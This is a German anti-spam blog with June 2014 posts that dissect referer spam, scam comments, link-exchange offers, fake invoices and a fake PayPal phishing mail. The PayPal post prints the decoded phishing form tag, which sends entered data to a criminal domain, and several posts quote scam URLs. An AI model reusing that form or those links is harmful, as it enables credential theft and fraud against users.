Suchbegriff-Referer-Spam

Dienstag, 10. Juni 2014

Ein Thema, dass alle Jahre wiederkommt, ist die Referer-Spam¹, die wegen ihres technischen und zunächst unsichtbaren Charakters oft unterschätzt wird und bei guter Machart als gezielter Angriff auch sehr gefährlich sein kann.

In diesem Fall scheint es jedoch mal wieder so zu sein, dass eine neue Generation von Anwendern von Blogs und CM-Systemen, die Referer-Spam noch nicht (oder nicht mehr) kennt, Plugins verbaut, um jene aktuellen Suchbegriffe irgendwo öffentlich auf der Website anzeigen zu lassen, mit denen sie von Lesern gefunden wurde. Deshalb simuliert diese aktuelle Referer-Spam Links von Suchmaschinen wie Google, Yahoo und Bing. In einer statistischen Auswertung der Serverlogs sieht die Spam unter den Suchbegriffen so aus:

Wenn diese gefälschten „Suchbegriffe“ irgendwo im Blog angezeigt werden, dann hat man sein Blog in eine Linkschleuder für betrügerische Pimmelpillen-Apotheker verwandelt – die übrigens ein hübsches, neues Layout für ihre Betrugssite gemacht haben. Auch die Bullshit-Firmierung „Trusted Tablets“ ist – zumindest in meinem täglichen Spameingang – recht frisch. Vermutlich gefällt es den Kriminellen nicht so gut, dass eine einfache Websuche nach ihrer Bullshit-Firmierung sofort den Betrug offenbart, weil das eben mies fürs „Geschäft“ ist. Da unter dem Begriff Tablets eher die Wischopäd-Computerchen gefunden werden, muss ich leider einräumen, dass diese trügerische „Firmierung“ gut gewählt ist, wenn sie auch eine eher triviale Abänderung früherer Namen von Betrugsapotheken ist.

Und weil ein vernünftiger Mensch – oder doch zumindest ein Mensch, der sich der Tatsache bewusst ist, dass für Links auf der eigenen Website gehaftet wird – niemals wollen kann, dass sein Blog zu einer Spamschleuder für derartige völlig unvermisst aus der Gesellschaft entfernbaren Gestalten wird, wird ein vernünftiger Mensch eben niemals für Spammer leicht manipulierbaren Dinge wie Referer oder die letzten Suchbegriffe irgendwo öffentlich anzeigen lassen.

Aber leider: Es kommt alle Jahre wieder.

¹Das englische Wort schreibt sich eigentlich „Referrer“, aber die falsche Schreibweise „Referer“ ist im HTT-Protokoll spezifiziert worden. Ich benutze hier den technischen Ausdruck.

Mr. philip

Dienstag, 10. Juni 2014

So nannte sich der Kommentator, der den folgenden handgeschriebenen Kommentar ausgerechnet auf Unser täglich Spam hinterlassen wollte:

Haben Sie einen Kredit? Wenn ja, senden Sie uns bitte konkurrieren (philipbrown991 (at) gmail (punkt) com) mit den Details unten Vollständiger Name: Betrag benötigt: Zeit: Telefonnummer: Land: Danke braun Mr.philip

Die Formatierung ist natürlich – mit Ausnahme der E-Mail-Adresse, die ich nicht so leicht benutzbar machen möchte – unverändert.

Die Frage, wie es im Kopfe eines Idioten aussieht, der allen Ernstes glaubt, dass es Menschen gibt, die wegen einer idiotischen und zudem stümperhaft formulierten und formatierten Spam in einem offenen Kommentarbereich anfangen würden, Darlehen zu beantragen, einen Datenstriptease vor einem Spammer zu machen und im nächsten Schritt auch noch Vorleistungen über Western Union zu erbringen, kann leider nur noch ein Metzger beantworten.

Kommentarspam dieser Machart habe ich beinahe täglich.

Kurz verlinkt

Montag, 9. Juni 2014

Die Erlöskrise der Print- und Onlinemedien führt zu Verzweiflungstaten, die an die Selbstabschaffung grenzen. Immer häufiger taucht sogenanntes “Native Advertising” auf […]

Weiterlesen bei Sprngsatz: Native Advertising – ein Missbrauch…

Angebot für kostenlosen Linktausch

Montag, 9. Juni 2014

Groteske Zeichnung eines Clowns. Dazu der Text: Du hast Post! Mail von Lena Bruschwitz! Solche Angebote lösen doch Verzückung aus! Und dann auch noch kostenlos. Ich muss nicht einmal dafür bezahlen, dass ich einen Link auf die Websites von Spammern setze. Was für eine Gnade!

Hallo,

Ich habe keine Ahnung, wer du bist, …

Ich möchte mich gerne vorstellen: mein Name ist Lena Bruschwitz,

…und du hast auch noch nie von mir gehört. Damit es so aussieht, als sei ich eine wirkliche Person, habe ich meinen ausgedachten Namen mit einem Profil bei LinkedIn verlinkt. Das ist ja fast so überzeugend, als hätte ich meinen Pass mitgesendet.

Da ich sehr viele hochqualitative seiten betreibe, möchte ich einen

kostenlosen Linktausch mit spam.tamagothi.de oder anderen Seite, die Sie besitzen, vorschlagen.

Vor einem Dreivierteljahr habe ich dir schon einmal das gleiche in den Maileingang gemacht, aber damals klang das Wort, das da jetzt fälschlich kleingeschrieben ist, noch ein bisschen anders: „Da ich sehr viele hochqualitative Glücksspielseiten betreibe…“ – nun, da sich nur die wenigsten Leute dazu bereit finden, unter den Bedingungen der Linkhaftung einen Anbieter von in der BRD illegalen Glücksspielen zu verlinken, habe ich das mal umformuliert. Und weil ich so eine Spezialexpertin mit Internet und so bin, ist mir bei meiner trivialen Bearbeitung der eine oder andere kaputt aussehende Absatz in den ansonsten gleichen Text geraten. Weil du musst wissen:

Sie werden sicher gerne hören, dass ich viele Ideen für einen Linktausch habe,

welcher sicherlich zu unserem Vorteil sein und unsere Rankings bei Google vorteilhaft beeinflussen wird.

Mit diesem Internetzeugs, da kenne ich mich echt mit aus!

Bitte lassen Sie mich wissen, ob Sie an weiteren Details interessiert sind oder andere Kommentare dazu haben.

Und jetzt sag mir bitte wenigstens, dass die Mail bei dir angekommen ist und gelesen wurde – und gib mir die Gelegenheit, dir weiteren Bullshit zu schreiben.

Ich freue mich, von Ihnen zu hören!

Ich verachte dich wie jeden anderen, dessen Website ich zur Litfaßsäule mit Reklame für illegale Angebote umbauen will.

Lena Bruschwitz

Das alles schreibt dir wie üblich ein ausgedachter Name mit…

http://www.deutschpagerank.com/
http://de.linkedin.com/pub/lena-bruschwitz/82/a13/1aa

…ganz tollen Websites.

Von der tollen Website von „Deutsch Page Rank“ habe ich gleich mal einen Screenshot für Interessierte und Genießer zu Flickr hochgeladen, damit auch jeder über den gratis, kostenlosen und gebührenfreien Linktausch lachen kann. Dieser wird präsentiert zusammen mit einer fröhlich-bunten Matrix aus allerlei appetitlichen App-Icons (jeweils in zwei Größen) und mit zwei lustigen Bildsalaten aus Browserlogos und Logos von Unternehmen, die garantiert nicht um Erlaubnis gefragt wurden, ob Spammer ihre Firmierung ein bisschen missbrauchen können.

Weil der Bullshit mit diesem Namen drunter mit der ermüdenden Regelmäßigkeit einer chinesischen Wasserfolter immer wieder mal ins Postfach geht, habe ich der guten Lena Bruschwitz mal ein Schlagwort spendiert – und das schaffen bei mir nur zertifizierte Idioten. Dass diese Idioten mit ihren Spamnummern meist auf Linktausch oder SEO machen, ist gewiss nur ein ganz dummer Zufall…

Konto-Status

Freitag, 6. Juni 2014

Nein, diese Mail kommt nicht von PayPal! Und sie ist ein weiteres Beispiel für die vielen schlechten Phishing-Mail, die man jeden verdammten Tag in seinem Posteingang (oder seinem Spamfilter) finden kann.

Lieber PayPal Kunde,

„Lieber Kunde“ ist genau der Name, den ich bei jedem Vertrag angebe.

Aufgrund der jüngsten betrgerischen [sic!] Aktivitäten haben wir ein neues Online-Sicherheitssystem für den maximalen Schutz der persönliche Daten unserer Kunden gestartet.

Wie man in einer HTML-formatierten E-Mail ein „ü“ codiert, wisst ihr nicht, aber vom tollen Online-Sicherheitssystem für den maximalen Schutz blahfaseln! Ihr seid mir schon ein paar Experten!

Nach dieser Tatsache, wird Ihnen angeboten, ihr PayPal-Konto zu aktualisieren.

Oh, was für ein tolles Angebot! 😀

Um Ihr PayPal-Konto zu aktualisieren, liegt Ihnen in Ihrer E-Mail Adresse ein Formular zur Verfügung [sic!].

Dieses „liegt zur Verfügung“ heißt, wenn man Deutsch spricht, übrigens „ist angehängt“. Aber woher soll ein armes Übersetzungsprogramm das wissen, wenn es mit dem alphabetisch sortierten Sprachgefühl eines Wörterbuches aus dem Russischen ins Deutsche übelsetzt.

Bitte laden Sie das Formular aus [sic!], rufen Sie ber [sic!] Ihren Internet-Browser und folgen Sie den Anweisungen auf dem Bildschirm.

Jemand, der Deutsch gekonnt hätte, hätte hier geschrieben: „Bitte speichern sie den Anhang und öffnen sie ihn anschließend in ihrem Browser“. Aber lassen wir das! Der Spammer mit der miesen Sprache und der noch mieseren Masche hängt also etwas an seine Spam und verlangt von den Empfängern allen Ernstes, dass sie diesen Anhang auch öffnen. Wer auch nur für zehn Cent Verstand hat, würde nicht auf Traum auf diese Idee kommen, zumal der Spammer auch noch…

Hinweis: Das Formular muss in einem modernen Browser geöffnet werden, dass [sic!] JavaScript aktiviert hat. (z.B. Internet Explorer, Mozilla Firefox)

…zwingend das Privileg haben will, Code im Browser auszuführen.

Der für den Spammer wichtige Code ist übrigens relativ harmlos, aber das werden die meisten Empfänger nicht nachvollziehen können, weil ihnen dafür das technische Verständnis fehlt. Er besteht aus folgender Zeile JavaScript, die ich hier als Screenshot meines Editors wiedergebe:

Screenshot eines Ausschnitts des betrügerischen HTML-Anhangs der Spam in meinem Editor

Aha, sagt sich der Spamgenießer, neuerdings schreibt man seinen HTML-Code nicht mehr direkt, sondern lässt ihn vom Browser mit einer Zeile JavaScript generieren, damit der kriminelle Müll wenigstens manchmal noch durch die Spamfilter geht. Was nach dem Aufruf von unescape() aus dem langen Text wird, sieht so aus:

<form method="post" onsubmit="return validateFormOnSubmit(this)" action="http://q.dnssv.tk/de/cgi-bin/webscr.php?cmd=_logout">

Was man in dieses Formular einträgt, geht also nicht in die PayPal-Domain, sondern in die deutlich weniger Vertrauen erweckende Domain t (punkt) dnssv (punkt) tk, die offensichtlich von Kriminellen kontrolliert wird. Das ist aber auch nicht weiter überraschend, denn das richtige PayPal versendet solche Mails nicht. Was hätte PayPal auch davon, wenn die Kunden…

…noch einmal jede Menge Daten mitteilen würden, die PayPal schon längst kennt?

Einmal ganz davon abgesehen, dass jemand bei PayPal wissen würde, dass einer dieser zwölf Abschnitte des Jahres auf Deutsch nicht als „Monath“ geschrieben wird und dass die „Postzahl“ hier eine „Postleitzahl“ genannt wird. Ein krimineller Spammer macht sich aber nicht die Mühe, sein Gestrokel auf Fehler abzusuchen, weil… tja… wenn er sich Mühe gäbe, er doch auch gleich arbeiten könnte.

Nach Abschluss dieser Phase [sic!] wird die Aktualisierung Ihres PayPal-Kontos normal funktionieren.

Und vorher auch. 😀

Wir entschuldigen uns für die Unannehmlichkeiten und danken Ihnen für Ihre Zeit. Für weitere Informationen kontaktieren Sie bitte den Kundenservice.

Oh, wie höflich! Ich könnte spucken vor Respekt!

Mit freundlichen Grüßen,
PayPal-Team.

Mit unfreundlichem Blick zurück
Spamessergemeinschaft.

Copyright ﾩ 1999-2014 PayPal. Alle Rechte vorbehalten.

(Und nein: Richtige Unternehmen, die so ein proklamiertes „geistiges Eigentum“ unter ihre E-Mails „rotzen“, sind in dieser intelligenzverachtenden Geste keinen Deut seriöser als dieser kriminelle Idiot von Phisher.)

PayPal (Europe) S.￠ r.l.et Cie, S.C.A.
Société en Commandite par Actions
Registered office: 22-24 Boulevard Royal, L-2449 Luxemburg
RCS Luxemburg B 118 349
PayPal Email ID PP58

Nun, von PayPal kommt diese Mail nicht. Zum Thema Phishing hat PayPal – lobenswerterweise! – selbst einen langen und guten Text auf seiner Website veröffentlicht, der das für jeden Nutzer völlig klar machen sollte – wenn er den Text denn auch liest.

YouTube-Nutzung der Marke DokuWorld2013

Donnerstag, 5. Juni 2014

Der YouTube-Kanal von DokuWorld2013 wird vielen Menschen kaum auffallen. Er ist im Wesentlichen eine Zweitverwertung von überwiegend reißerischen TV-Dokumentationen der gebührenfinanzierten Fernsehanstalten der Bundesrepublik Deutschland. Die Videoqualität ist oft in miserablem 240p, in einigen Fällen ist aber auch 720p verfügbar. Hier ein Screenshot seines Uploads der ZDF-Dokumentation „Mengeles Erben – Menschenexperimente im Kalten Krieg“ – ich habe allerdings das vom Uploader gewählte Vorschaubild eines geöffneten Schädels mit freiliegendem Gehirn ebenso unkenntlich gemacht wie die beiden Links, die noch vor jedem informativen Text in der Beschreibung stehen:

Diese urheberrechtlich recht fragwürdigen Videouploads werden durch Kommentare in „Verschwörungs-Websites“ und mutmaßlich auch in diversen „sozialen Netzwerken“ bekannt gemacht und gewinnen so – trotz ihrer ~~beschiss~~… ähm… bescheidenen Videoqualität eine nennenswerte Anzahl von Betrachtern, in Falle dieses einen Beispieles immerhin eine drittel Million.

Da niemand beim Link auf YouTube Verdacht schöpft, vor allem, wenn das Video auch thematisch passend ist, bleibt derartige Kommentarspam oft stehen.

Was dieses Vorgehen zur Spam macht, zeigt sich in der Beschreibung des Videos. Der unbekannte Uploader weiß offenbar, dass nur die wenigsten Menschen jemals die komplette Beschreibung aufklicken und legt deshalb großen Wert darauf, dass der für sein „Geschäft“ wichtigste Bestandteil der Beschreibung unmittelbar sichtbar ist. Dieser besteht aus zwei Links:

Der erste Link ist über den URL-Kürzer bit.ly maskiert und führt auf ein fragwürdiges Gewinnspiel, das zur Teilnahme einen sehr umfassenden Datenstriptease voraussetzt – und dessen Website ohne aktiviertes JavaScript in keiner Weise zugänglich ist, was bei derartigen Links mit Spamhintergrund alle Alarmglocken klingeln lassen sollte. Was einem Teilnehmer solcher „Spiele“ alles widerfahren kann, habe ich vor fünf Jahren hier auf Unser täglich Spam an einem Beispiel aufgezeigt. Ob die im Regelfall sehr geringe Gewinnchance diesen Ärger wert ist? Meiner Meinung nach nicht, zumal die Gestalten, mit denen man sich anschließend herumschlagen muss, mindestens halbseiden, wenn nicht gar kriminell sind.
Der zweite Link ist ein Affiliate-Link auf Amazon, der mutmaßlich dazu führt, dass der Spammer bei Bestellungen mitverdient.

Diese Links habe ich unter jeder hochgeladenen Dokumentation gefunden, auf die ich einen Blick geworfen habe. Es handelt sich also nicht um einen Ausrutscher nach einer dummen Idee, sondern um eine langfristig verfolgte Methode.

Ich gratuliere diesem Spammer zu seiner Idee, unter anderem Verschwörungsspinner abzuzocken, denn in diesen Kreisen wird das Gehirn oft dünn gesät sein. Aber er bleibt ein Spammer, und in seiner Methodik – Benutzung der Produktionen anderer Leute, um damit wenig erfreuliche Geschäfte zu machen – ist er bemerkenswert asozial. Das ist auch schon dem einen oder anderen Betrachter der hochgeladenen Videos aufgefallen, so dass es zu Kommentaren wie diesem gekommen ist:

ACHTUNG, BETRÜGERLINKS IN DER BESCHREIBUNG!
DAUMEN RUNTER FÜR JEDES VIDEO UND DIESEN KANAL!

Nun, diesem Urteil und dieser Aufforderung kann ich mich anschließen! Und die Dokumentationen sollte man – wenn man sie irgendwo einbetten will oder einen Link versenden will – vielleicht vom Kanal eines erfreulicheren Mitmenschen nehmen.

Hallo, ARD, ZDF und Classe politique der BRD! Diese Art von Missbrauch von gebührenfinanzierten TV-Produktionen gäbe es nicht, wenn alle diese Dokumentationen in hoher Qualität und ohne den Bullshit der gesetzlich erzwungenen „Depublizierung“ dauerhaft in den Mediatheken der TV-Sender verfügbar gehalten würden. Oder anders gesagt, werte Politiker von CDU, SPD, CSU, FDP und von Bündnis 90/Die Grünen: Eure im Bundestag – mutmaßlich nach diversen Gefälligkeiten der Presseverleger – zum geltenden Recht gemachte Pflicht zum Löschen aus den Mediatheken der gebührenfinanzierten TV-Anstalten hat die hier nur kurz angerissene Form der halbseidenen Spam-Geschäftemacherei erst ermöglicht. Oder kurz: Politiker, der Gefallen, den du mit dem lobbyistisch vorformulierten Gesetz deinem tintenklecksenden Freund von Presseverleger getan hast, nützt vor allem Kriminellen, Spammern und vergleichbarem lichtscheuen Gesindel. Zum Glück geht die Presse, die aller Leben schlechter machen will, dennoch den Bach herunter. Ändert diesen Unsinn also bitte mal, und zwar so schnell wie möglich!

Ihre Rechnung von zooplus

Mittwoch, 4. Juni 2014

Diese Mail kommt nicht von Zooplus.

vielen Dank für Ihre Bestellung 51273295.

Schön, ich habe keinen Namen und ich habe eine Zahl bestellt.

Für Ihre Unterlagen erhalten Sie anbei die dazu gehörige [sic!] Rechnung als Anhang im pdf-Format. Sie können diese abspeichern oder bei Bedarf ausdrucken. [Ach!]

Sollten Sie weitere Fragen zu Ihrer Bestellung haben, erreichen Sie unseren Kundenservice über unser Kontaktformular. Klicken Sie dazu bitte hier:

https://www.zooplus.de/kontakt

Ihr zooplus
Service-Team

Um nicht alles zu wiederholen, was ich schon vorgestern zu einer Spam mit ähnlicher Machart schrieb, hier die Kompaktversion:

Der vorgebliche Absender ist nicht der Absender. Die Absenderadresse der Spam ist ebenfalls gefälscht. Rückfragen sind sinnlos.
Der Anhang ist Schadsoftware!
Der Anhang ist ganz aktuelle Schadsoftware, die zurzeit von weniger als einem Drittel der gängigen Antivirus-Schlangenöle als solche erkannt wird!
Es ist erforderlich, zu lernen, derartige Spam selbst als Spam zu erkennen – was hier wirklich nicht schwierig ist – und sie zu löschen, statt darin herumzuklicken, oder man hat ganz schnell einen Computer anderer Leute auf dem Schreibtisch stehen.
Das Antivirus-Programm schützt nicht gegen aktuelle Schadsoftware. Es ist technoquacksalberisches Schlangenöl.
Derartigen kriminellen Müll einfach löschen! Danach den schöneren Dingen im Internet zuwenden! Viel Spaß dabei!

Insane prices, June discounts.

Mittwoch, 4. Juni 2014

Oh, jetzt habe ich mich doch glatt beim Betreff verlesen – da steht ja gar nicht „junk discounts“.

Spend dimes for best products in Internet. We mean it, our prices are stunning

http://elias.dqfsmedic.ru/?3E198

So so, ich kann also Zehn-Cent-Münzen für die besten Produkte im Internet ausgeben. Was für Produkte? Egal. Produkte eben. Katzen im Sack zum Beispiel. Vielleicht auch Katzen in einem Sack, der beim Öffnen einen leichten Verwesungsgeruch verbreitet – so dass auch gleich klar wird, warum die Preise so atemberaubend sind. Was will man auch für eine Zehn-Cent-Münze erwarten? Oder für einige hundert von diesen Münzen?

Und nach dieser Ansage soll ich in eine Spam klicken?

Spammer, ich weiß ja nicht, wo du das Denken gelernt hast, aber es war kein so gutes Umfeld.